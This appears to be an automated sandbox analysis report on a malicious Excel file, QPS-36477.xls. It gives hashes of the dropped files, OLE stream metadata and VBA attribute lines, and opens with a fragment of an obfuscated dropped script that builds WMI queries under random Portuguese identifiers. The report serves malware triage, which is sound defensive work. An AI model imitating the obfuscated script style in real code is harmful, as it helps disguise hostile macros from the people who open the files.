                                                                                                                                                                                                                    Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .p.l.a.t.i.r.r.o.s.t.r.o.(.a.r.g.i.l.l.i.t.a.,. .s.o.c.r.a.t.i.c.a.m.e.n.t.e.,. .e.s.f.e.n.o.i.d.e.,. .g.a.l.l.i.n.h.e.i.r.a.,. .a.l.a.b.a.r.d.i.n.o.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . .

                                                                                                                                                                                                                    C:\Users\user\Desktop\58430000

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 14:23:56 2024, Security: 1
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1085952
                                                                                                                                                                                                                    Entropy (8bit):7.283616680066594
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:KmzHJEHAfwu4hjD3DERnLRmF8DNtrf1I3dewux+8h+4OrysUn90SYXzxK3IFH7FX:tLw/hjbARM8rq34+94OrysU94F1F3zx
                                                                                                                                                                                                                    MD5:A9C211C9947B3D94F6EEF22940DD2FA0
                                                                                                                                                                                                                    SHA1:64B01BED2170C17DDC263E89F8074B83CDADA987
                                                                                                                                                                                                                    SHA-256:F665E7845A04CC6C7A5EFE8B3548DEF8FDAC5075962B7941760E3D1FD2AEC0D8
                                                                                                                                                                                                                    SHA-512:C0C584C0B57FE993482CC23E78B68FE0C2E0C13E0011FCA96A0B51EE6E91E9F205D43B51B21E3C454441A70CF07FEDC0742567860F9AE92C4BE1BD1513F45ED0
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:......................>...............................................................................;.......................h.......j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                                                    C:\Users\user\Desktop\58430000:Zone.Identifier

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                    C:\Users\user\Desktop\QPS-36477.xls (copy)

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 14:23:56 2024, Security: 1
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1085952
                                                                                                                                                                                                                    Entropy (8bit):7.283616680066594
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:KmzHJEHAfwu4hjD3DERnLRmF8DNtrf1I3dewux+8h+4OrysUn90SYXzxK3IFH7FX:tLw/hjbARM8rq34+94OrysU94F1F3zx
                                                                                                                                                                                                                    MD5:A9C211C9947B3D94F6EEF22940DD2FA0
                                                                                                                                                                                                                    SHA1:64B01BED2170C17DDC263E89F8074B83CDADA987
                                                                                                                                                                                                                    SHA-256:F665E7845A04CC6C7A5EFE8B3548DEF8FDAC5075962B7941760E3D1FD2AEC0D8
                                                                                                                                                                                                                    SHA-512:C0C584C0B57FE993482CC23E78B68FE0C2E0C13E0011FCA96A0B51EE6E91E9F205D43B51B21E3C454441A70CF07FEDC0742567860F9AE92C4BE1BD1513F45ED0
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:......................>...............................................................................;.......................h.......j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 08:27:12 2024, Security: 1
                                                                                                                                                                                                                    Entropy (8bit):7.263958635177038
                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                    • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                                                                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                                                                                    File name:QPS-36477.xls
                                                                                                                                                                                                                    File size:1'094'656 bytes
                                                                                                                                                                                                                    MD5:912e8c547d1e8dd1e12afbd819074b30
                                                                                                                                                                                                                    SHA1:96fd97dc12ae0a792c85fdf7ec9a2424a90097b3
                                                                                                                                                                                                                    SHA256:b86e4c334af2fdbe88b3cb50cd85c47eac10a9e9b9ac7c0dd656e37cabce7a5a
                                                                                                                                                                                                                    SHA512:b22b475560991182a6f3e29504ebabcad865c40b1688e75ad575c2fabed7cd47be71f328518a777daea92632c0ebcdbe2ce3c215d089b2549c84ad0e4cd8ef9f
                                                                                                                                                                                                                    SSDEEP:12288:ImzHJEHAfwu4hCD3DERnLRmF8D3Prf1T3dmFupFZ6pxw3FQNXcp5tkM3r4r:DLw/hCbARM8fN3VbgxmScpB4r
                                                                                                                                                                                                                    TLSH:A535DF83EA1D4F62CE45423066F7177A1320CC83D522872B22F5772939FBAD06956FAD
                                                                                                                                                                                                                    File Content Preview:........................>...............................................................................<.......................i.......k......................................................................................................................

                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                    Icon Hash:276ea3a6a6b7bfbf

                                                                                                                                                                                                                    Static OLE Info

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Document Type:OLE
                                                                                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                                                                                    OLE File "QPS-36477.xls"

                                                                                                                                                                                                                    Indicators
                                                                                                                                                                                                                    Has Summary Info:
                                                                                                                                                                                                                    Application Name:Microsoft Excel
                                                                                                                                                                                                                    Encrypted Document:True
                                                                                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                                                                                    Contains ObjectPool Stream:False
                                                                                                                                                                                                                    Flash Objects Count:0
                                                                                                                                                                                                                    Contains VBA Macros:True
                                                                                                                                                                                                                    Summary
                                                                                                                                                                                                                    Code Page:1252
                                                                                                                                                                                                                    Author:
                                                                                                                                                                                                                    Last Saved By:
                                                                                                                                                                                                                    Create Time:2006-09-16 00:00:00
                                                                                                                                                                                                                    Last Saved Time:2024-10-08 07:27:12
                                                                                                                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                                                                                                                    Security:1
                                                                                                                                                                                                                    Document Summary
                                                                                                                                                                                                                    Document Code Page:1252
                                                                                                                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                                                                                                                    Contains Dirty Links:False
                                                                                                                                                                                                                    Shared Document:False
                                                                                                                                                                                                                    Changed Hyperlinks:False
                                                                                                                                                                                                                    Application Version:786432

                                                                                                                                                                                                                    Streams with VBA

                                                                                                                                                                                                                    VBA File Name: Sheet1.cls, Stream Size: 977
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                                                                                    VBA File Name:Sheet1.cls
                                                                                                                                                                                                                    Stream Size:977
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . ) . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                                                                                                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 12 48 16 29 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    VBA Code
                                                                                                                                                                                                                    Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                                                    VBA File Name: Sheet2.cls, Stream Size: 977
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                                                                                                    VBA File Name:Sheet2.cls
                                                                                                                                                                                                                    Stream Size:977
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 12 48 a3 a8 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    VBA Code
                                                                                                                                                                                                                    Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                                                    VBA File Name: Sheet3.cls, Stream Size: 977
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                                                                                                                    VBA File Name:Sheet3.cls
                                                                                                                                                                                                                    Stream Size:977
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H H . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 12 48 af 48 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    VBA Code
                                                                                                                                                                                                                    Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                                                    VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                                                                                    VBA File Name:ThisWorkbook.cls
                                                                                                                                                                                                                    Stream Size:985
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H T Y . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 .
                                                                                                                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 12 48 54 59 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    VBA Code
                                                                                                                                                                                                                    Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                                                    Streams

                                                                                                                                                                                                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:\x1CompObj
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:114
                                                                                                                                                                                                                    Entropy:4.25248375192737
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:244
                                                                                                                                                                                                                    Entropy:2.889430592781307
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:200
                                                                                                                                                                                                                    Entropy:3.2603503175049817
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . } S . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/\x1CompObj
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:114
                                                                                                                                                                                                                    Entropy:4.25248375192737
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/\x5DocumentSummaryInformation
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:244
                                                                                                                                                                                                                    Entropy:2.701136490257069
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", Stream Size: 90976
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/\x5SummaryInformation
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                                                                                                                                                    Stream Size:90976
                                                                                                                                                                                                                    Entropy:1.885975041684416
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . .
                                                                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD0018D4CE/\x1Ole
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:20
                                                                                                                                                                                                                    Entropy:0.5689955935892812
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD0018D4CE/\x3ObjInfo
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:4
                                                                                                                                                                                                                    Entropy:0.8112781244591328
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . .
                                                                                                                                                                                                                    Data Raw:00 00 03 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD0018D4CE/Contents
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                                                                                                                                                    Stream Size:197671
                                                                                                                                                                                                                    Entropy:6.989042939766534
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
